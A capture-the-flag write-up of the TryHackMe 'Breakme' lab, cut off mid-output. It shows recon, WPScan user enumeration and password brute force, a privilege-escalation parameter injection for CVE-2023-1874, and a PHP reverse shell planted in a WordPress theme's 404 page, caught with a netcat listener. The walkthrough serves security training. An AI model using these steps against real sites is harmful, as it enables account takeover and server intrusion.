Breakme

Break this secure system and get the flags, if you can.

BreakmeTryHackMe

Recon

Let's start with a nmap scan.

┌──(kali㉿kali)-[~]
└─$ nmap breakme.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:14 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,80 breakme.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:21 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 8e:4f:77:7f:f6:aa:6a:dc:17:c9:bf:5a:2b:eb:8c:41 (RSA)
|   256 a3:9c:66:73:fc:b9:23:c0:0f:da:1d:c9:84:d6:b1:4a (ECDSA)
|_  256 6d:c2:0e:89:25:55:10:a9:9e:41:6e:0d:81:9a:17:cb (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds

We use Ferroxbuster for a directory scan. It’s evident that the web server in question is operating WordPress.

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://breakme.thm/ -w /usr/share/wordlists/dirb/big.txt 
                                                                                                                                                                                                                                            
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://breakme.thm/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       24l      126w    10355c http://breakme.thm/icons/openlogo-75.png
200      GET      368l      933w    10701c http://breakme.thm/
301      GET        9l       28w      311c http://breakme.thm/manual => http://breakme.thm/manual/
301      GET        9l       28w      314c http://breakme.thm/manual/da => http://breakme.thm/manual/da/
301      GET        9l       28w      314c http://breakme.thm/manual/en => http://breakme.thm/manual/en/
301      GET        9l       28w      314c http://breakme.thm/manual/de => http://breakme.thm/manual/de/
301      GET        9l       28w      314c http://breakme.thm/manual/es => http://breakme.thm/manual/es/
301      GET        9l       28w      318c http://breakme.thm/manual/images => http://breakme.thm/manual/images/
200      GET        3l       26w     3083c http://breakme.thm/manual/images/mod_rewrite_fig1.png
200      GET        1l        5w       87c http://breakme.thm/manual/images/right.gif
200      GET       10l       34w     2420c http://breakme.thm/manual/images/mod_rewrite_fig2.png
200      GET       18l      118w     6536c http://breakme.thm/manual/images/feather.gif
200      GET        1l        5w       84c http://breakme.thm/manual/images/down.gif
200      GET       14l       54w     2412c http://breakme.thm/manual/images/index.gif
200      GET       25l       87w     6358c http://breakme.thm/manual/images/mod_rewrite_fig1.gif
200      GET       16l       74w     5983c http://breakme.thm/manual/images/ssl_intro_fig1.png
200      GET        8l       24w     1868c http://breakme.thm/manual/images/mod_filter_new.png
200      GET       26l      111w    10616c http://breakme.thm/manual/images/ssl_intro_fig1.gif
200      GET       50l      355w    31098c http://breakme.thm/manual/images/custom_errordocs.png
200      GET      105l      493w    29291c http://breakme.thm/manual/images/caching_fig1.gif
301      GET        9l       28w      314c http://breakme.thm/manual/fr => http://breakme.thm/manual/fr/
200      GET      158l     1179w    92140c http://breakme.thm/manual/images/build_a_mod_3.png
200      GET      931l     5534w   463351c http://breakme.thm/manual/images/bal-man.png
301      GET        9l       28w      314c http://breakme.thm/manual/ja => http://breakme.thm/manual/ja/
301      GET        9l       28w      314c http://breakme.thm/manual/ko => http://breakme.thm/manual/ko/
301      GET        9l       28w      324c http://breakme.thm/manual/da/developer => http://breakme.thm/manual/da/developer/
301      GET        9l       28w      318c http://breakme.thm/manual/da/faq => http://breakme.thm/manual/da/faq/
301      GET        9l       28w      324c http://breakme.thm/manual/en/developer => http://breakme.thm/manual/en/developer/
301      GET        9l       28w      324c http://breakme.thm/manual/de/developer => http://breakme.thm/manual/de/developer/
301      GET        9l       28w      324c http://breakme.thm/manual/es/developer => http://breakme.thm/manual/es/developer/
301      GET        9l       28w      317c http://breakme.thm/manual/pt-br => http://breakme.thm/manual/pt-br/
301      GET        9l       28w      320c http://breakme.thm/manual/da/howto => http://breakme.thm/manual/da/howto/
301      GET        9l       28w      324c http://breakme.thm/manual/ja/developer => http://breakme.thm/manual/ja/developer/
301      GET        9l       28w      314c http://breakme.thm/manual/ru => http://breakme.thm/manual/ru/
301      GET        9l       28w      318c http://breakme.thm/manual/es/faq => http://breakme.thm/manual/es/faq/
301      GET        9l       28w      318c http://breakme.thm/manual/de/faq => http://breakme.thm/manual/de/faq/
301      GET        9l       28w      317c http://breakme.thm/manual/style => http://breakme.thm/manual/style/
200      GET       42l      190w     1425c http://breakme.thm/manual/style/sitemap.dtd
200      GET       24l      127w      907c http://breakme.thm/manual/style/lang.dtd
301      GET        9l       28w      320c http://breakme.thm/manual/en/howto => http://breakme.thm/manual/en/howto/
200      GET     1622l     6889w    73959c http://breakme.thm/manual/style/scripts/prettify.js
200      GET        5l       21w      167c http://breakme.thm/manual/style/scripts/MINIFY
301      GET        9l       28w      320c http://breakme.thm/manual/es/howto => http://breakme.thm/manual/es/howto/
301      GET        9l       28w      320c http://breakme.thm/manual/de/howto => http://breakme.thm/manual/de/howto/
301      GET        9l       28w      314c http://breakme.thm/manual/tr => http://breakme.thm/manual/tr/
301      GET        9l       28w      314c http://breakme.thm/wordpress => http://breakme.thm/wordpress/
301      GET        9l       28w      324c http://breakme.thm/manual/ko/developer => http://breakme.thm/manual/ko/developer/
301      GET        9l       28w      319c http://breakme.thm/manual/da/misc => http://breakme.thm/manual/da/misc/
301      GET        9l       28w      320c http://breakme.thm/manual/ja/howto => http://breakme.thm/manual/ja/howto/
301      GET        9l       28w      318c http://breakme.thm/manual/da/mod => http://breakme.thm/manual/da/mod/
301      GET        9l       28w      318c http://breakme.thm/manual/ko/faq => http://breakme.thm/manual/ko/faq/
301      GET        9l       28w      320c http://breakme.thm/manual/fr/howto => http://breakme.thm/manual/fr/howto/
301      GET        9l       28w      317c http://breakme.thm/manual/zh-cn => http://breakme.thm/manual/zh-cn/
301      GET        9l       28w      319c http://breakme.thm/manual/en/misc => http://breakme.thm/manual/en/misc/
301      GET        9l       28w      319c http://breakme.thm/manual/es/misc => http://breakme.thm/manual/es/misc/
301      GET        9l       28w      318c http://breakme.thm/manual/en/mod => http://breakme.thm/manual/en/mod/
301      GET        9l       28w      323c http://breakme.thm/manual/da/platform => http://breakme.thm/manual/da/platform/
301      GET        9l       28w      323c http://breakme.thm/manual/da/programs => http://breakme.thm/manual/da/programs/
301      GET        9l       28w      319c http://breakme.thm/manual/de/misc => http://breakme.thm/manual/de/misc/
301      GET        9l       28w      318c http://breakme.thm/manual/es/mod => http://breakme.thm/manual/es/mod/
301      GET        9l       28w      321c http://breakme.thm/manual/es/vhosts => http://breakme.thm/manual/es/vhosts/
301      GET        9l       28w      324c http://breakme.thm/manual/tr/developer => http://breakme.thm/manual/tr/developer/
301      GET        9l       28w      325c http://breakme.thm/wordpress/wp-content => http://breakme.thm/wordpress/wp-content/
301      GET        9l       28w      323c http://breakme.thm/wordpress/wp-admin => http://breakme.thm/wordpress/wp-admin/
301      GET        9l       28w      326c http://breakme.thm/wordpress/wp-includes => http://breakme.thm/wordpress/wp-includes/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/assets => http://breakme.thm/wordpress/wp-includes/assets/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/blocks => http://breakme.thm/wordpress/wp-includes/blocks/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/certificates => http://breakme.thm/wordpress/wp-includes/certificates/
301      GET        9l       28w      327c http://breakme.thm/wordpress/wp-admin/css => http://breakme.thm/wordpress/wp-admin/css/
301      GET        9l       28w      330c http://breakme.thm/wordpress/wp-includes/css => http://breakme.thm/wordpress/wp-includes/css/
301      GET        9l       28w      336c http://breakme.thm/wordpress/wp-includes/customize => http://breakme.thm/wordpress/wp-includes/customize/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/audio => http://breakme.thm/wordpress/wp-includes/blocks/audio/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/archives => http://breakme.thm/wordpress/wp-includes/blocks/archives/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/avatar => http://breakme.thm/wordpress/wp-includes/blocks/avatar/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/button => http://breakme.thm/wordpress/wp-includes/blocks/button/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/buttons => http://breakme.thm/wordpress/wp-includes/blocks/buttons/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/calendar => http://breakme.thm/wordpress/wp-includes/blocks/calendar/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/block => http://breakme.thm/wordpress/wp-includes/blocks/block/
301      GET        9l       28w      344c http://breakme.thm/wordpress/wp-includes/blocks/categories => http://breakme.thm/wordpress/wp-includes/blocks/categories/
301      GET        9l       28w      330c http://breakme.thm/wordpress/wp-admin/images => http://breakme.thm/wordpress/wp-admin/images/
301      GET        9l       28w      326c http://breakme.thm/wordpress/wp-admin/js => http://breakme.thm/wordpress/wp-admin/js/
301      GET        9l       28w      332c http://breakme.thm/wordpress/wp-admin/includes => http://breakme.thm/wordpress/wp-admin/includes/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/code => http://breakme.thm/wordpress/wp-includes/blocks/code/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-includes/images => http://breakme.thm/wordpress/wp-includes/images/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/column => http://breakme.thm/wordpress/wp-includes/blocks/column/
301      GET        9l       28w      342c http://breakme.thm/wordpress/wp-includes/blocks/comments => http://breakme.thm/wordpress/wp-includes/blocks/comments/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/columns => http://breakme.thm/wordpress/wp-includes/blocks/columns/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/cover => http://breakme.thm/wordpress/wp-includes/blocks/cover/
301      GET        9l       28w      329c http://breakme.thm/wordpress/wp-includes/js => http://breakme.thm/wordpress/wp-includes/js/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/details => http://breakme.thm/wordpress/wp-includes/blocks/details/
301      GET        9l       28w      329c http://breakme.thm/wordpress/wp-admin/maint => http://breakme.thm/wordpress/wp-admin/maint/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/embed => http://breakme.thm/wordpress/wp-includes/blocks/embed/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-admin/css/colors => http://breakme.thm/wordpress/wp-admin/css/colors/
301      GET        9l       28w      331c http://breakme.thm/wordpress/wp-admin/network => http://breakme.thm/wordpress/wp-admin/network/
301      GET        9l       28w      335c http://breakme.thm/wordpress/wp-includes/css/dist => http://breakme.thm/wordpress/wp-includes/css/dist/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/file => http://breakme.thm/wordpress/wp-includes/blocks/file/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/gallery => http://breakme.thm/wordpress/wp-includes/blocks/gallery/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/group => http://breakme.thm/wordpress/wp-includes/blocks/group/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/heading => http://breakme.thm/wordpress/wp-includes/blocks/heading/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/html => http://breakme.thm/wordpress/wp-includes/blocks/html/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/image => http://breakme.thm/wordpress/wp-includes/blocks/image/
301      GET        9l       28w      333c http://breakme.thm/wordpress/wp-content/plugins => http://breakme.thm/wordpress/wp-content/plugins/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/list => http://breakme.thm/wordpress/wp-includes/blocks/list/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/images/crystal => http://breakme.thm/wordpress/wp-includes/images/crystal/
301      GET        9l       28w      335c http://breakme.thm/wordpress/wp-includes/sitemaps => http://breakme.thm/wordpress/wp-includes/sitemaps/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-includes/js/dist => http://breakme.thm/wordpress/wp-includes/js/dist/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-includes/js/crop => http://breakme.thm/wordpress/wp-includes/js/crop/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/blocks/missing => http://breakme.thm/wordpress/wp-includes/blocks/missing/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/blocks/more => http://breakme.thm/wordpress/wp-includes/blocks/more/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-content/plugins/akismet => http://breakme.thm/wordpress/wp-content/plugins/akismet/
301      GET        9l       28w      328c http://breakme.thm/wordpress/wp-admin/user => http://breakme.thm/wordpress/wp-admin/user/
301      GET        9l       28w      344c http://breakme.thm/wordpress/wp-includes/blocks/navigation => http://breakme.thm/wordpress/wp-includes/blocks/navigation/
301      GET        9l       28w      332c http://breakme.thm/wordpress/wp-content/themes => http://breakme.thm/wordpress/wp-content/themes/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/blocks/query => http://breakme.thm/wordpress/wp-includes/blocks/query/
301      GET        9l       28w      340c http://breakme.thm/wordpress/wp-includes/blocks/spacer => http://breakme.thm/wordpress/wp-includes/blocks/spacer/
301      GET        9l       28w      341c http://breakme.thm/wordpress/wp-includes/images/smilies => http://breakme.thm/wordpress/wp-includes/images/smilies/
301      GET        9l       28w      339c http://breakme.thm/wordpress/wp-includes/js/swfupload => http://breakme.thm/wordpress/wp-includes/js/swfupload/
301      GET        9l       28w      338c http://breakme.thm/wordpress/wp-includes/js/thickbox => http://breakme.thm/wordpress/wp-includes/js/thickbox/
301      GET        9l       28w      337c http://breakme.thm/wordpress/wp-includes/js/tinymce => http://breakme.thm/wordpress/wp-includes/js/tinymce/
301      GET        9l       28w      345c http://breakme.thm/wordpress/wp-includes/sitemaps/providers => http://breakme.thm/wordpress/wp-includes/sitemaps/providers/
301      GET        9l       28w      334c http://breakme.thm/wordpress/wp-admin/js/widgets => http://breakme.thm/wordpress/wp-admin/js/widgets/

Visiting the index page, we are just greeted with an Apache2 Debian default page.

We visit the WordPress site and discover that it is a straightforward blog.

http://breakme.thm/wordpress/

We seem to be in the right place http://breakme.thm/wordpress/index.php/breakme/.

Next, we use WPScan to analyze the WordPress application. It reveals that the site is running version 6.4.3, which contains a vulnerability allowing user enumeration.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/                                                          
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:17:29 2024
.
.
.
.
[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |  - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>

[+] WordPress theme in use: twentytwentyfour
 | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

Initial Access

We continue focusing on the WordPress site and run additional WPScan assessments to extract more useful information. These scans help identify potential vulnerabilities that could be exploited.

WPScan Part I - Enum Credentials

We begin by attempting to enumerate existing users on the WordPress site. Through this process, we successfully identify two users: bob and admin.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:29:14 2024
.
.
.
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://breakme.thm/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bob
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Next, we proceed to brute-force the passwords for both users. We manage to successfully crack the password for user bob.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/ -U admin,bob -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:31:09 2024
.
.
.
.
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - bob / soccer                                                                                                                                                                                                                    
^Cying admin / 121589 Time: 00:20:10 <                                                                                                                                                            > (18419 / 28688814)  0.06%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: bob, Password: [REDACTED]

A link in the sample page http://breakme.thm/wordpress/index.php/sample-page takes us to the login window.

We log in using the discovered credentials but realize that the account doesn't have elevated privileges. The admin dashboard is not visible, indicating this user has limited permissions.

We can make changes to our profile and are able to make minor adjustments at the dashboard.

WPSan Part II - Further Enumeration (WPScan API Key)

It looks like we haven't discovered everything yet. Next we run another WPScan, this time with an API key.

This can be obtained free of charge after registering on the next page of WPScan. This will allow us to get our results associated with CVEs.

We run the WPScan using the API key and discover an interesting finding that belongs to CVE-2023-1874, which is WP Data Access <= 5.3.7 - Authenticated (Subscriber+) Privilege Escalation.

┌──(kali㉿kali)-[~]
└─$ export  WPSCAN_API_TOKEN=[REDACTED]
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/                                                 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct  7 12:53:11 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.56 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://breakme.thm/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://breakme.thm/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://breakme.thm/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
 | Found By: Rss Generator (Passive Detection)
 |  - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |  - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
 |     Fixed in: 6.4.4
 |     References:
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
 |
 | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
 |     Fixed in: 6.4.5
 |     References:
 |      - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/

[+] WordPress theme in use: twentytwentyfour
 | Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-data-access
 | Location: http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/
 | Last Updated: 2024-09-18T00:01:00.000Z
 | [!] The version is out of date, the latest version is 5.5.14
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 3 vulnerabilities identified:
 |
 | [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
 |     Fixed in: 5.3.8
 |     References:
 |      - https://wpscan.com/vulnerability/7871b890-5172-40aa-88f2-a1b95e240ad4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1874
 |      - https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
 |
 | [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/39d1f22f-ea34-4d94-9dc2-12661cf69d36
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
 |
 | [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery
 |     Fixed in: 5.5.9
 |     References:
 |      - https://wpscan.com/vulnerability/4fe0d330-6511-4500-ac3f-b9bb944b8f0e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43295
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/85a33508-71f2-4aa1-8d51-667eb0690fbd
 |
 | Version: 5.3.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Mon Oct  7 12:53:26 2024
[+] Requests Done: 176
[+] Cached Requests: 5
[+] Data Sent: 47.983 KB
[+] Data Received: 311.351 KB
[+] Memory used: 273.23 MB
[+] Elapsed time: 00:00:14

We can find out more about the vulnerability in the following post:

Privilege Escalation Vulnerability Patched Promptly in WP Data Access WordPress PluginWordfence

So we update our profile first.

We submit the request and intercept it via Burp Suite. We must now add the following parameter, which is not already set.

&wpda_role[]=administrator

We assign ourselves the administrator role. However, if we make an error with the parameter and input it incorrectly, we risk being locked out and losing access to the dashboard, requiring a machine restart to regain access.

Reverse Shell

To establish a foothold, we leverage our elevated privileges to create a reverse shell. Following guidance from Hacktricks, we modify a template page's content with a reverse shell script, utilizing revshells.com to generate a suitable Pentest Monkey reverse shell. We ensure this process runs in the background while setting up a listener to catch the incoming connection.

WordpressHackTricks

Next, we reach out to the following Page to update a template for a reverse shell.

http://breakme.thm/wordpress/wp-admin/theme-editor.php

Here we first set the template to Twenty-Twenty One, because this has a PHP template for the 404 page. We select this and then replace everything with the reverse shell content and then update the file.

Now we only need to call up our edited page with the following URL:

http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php

We then get a reverse shell on our listener and upgrade our shell. We are www-data, but don't have access to the first flag for the time being.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1337                        
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.221.241] 43952
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux
 03:49:00 up  2:18,  0 users,  load average: 0.00, 0.00, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (616): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Breakme:/$ 

First. Let's upgrade this shell.

Upgrade Simple Shells to Fully Interactive TTYs

We transfer linpeas to the machine and run it.

After our Linpeas scan we find access possibilities to files of other users john and youcef.

We find the first flag in john's home directory, but have no access to it. We may have to get access to user john.

Reverse Shell as john

When enurering using www-data, we detect an internal service running on port 9999.

www-data@Breakme:/home/john$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
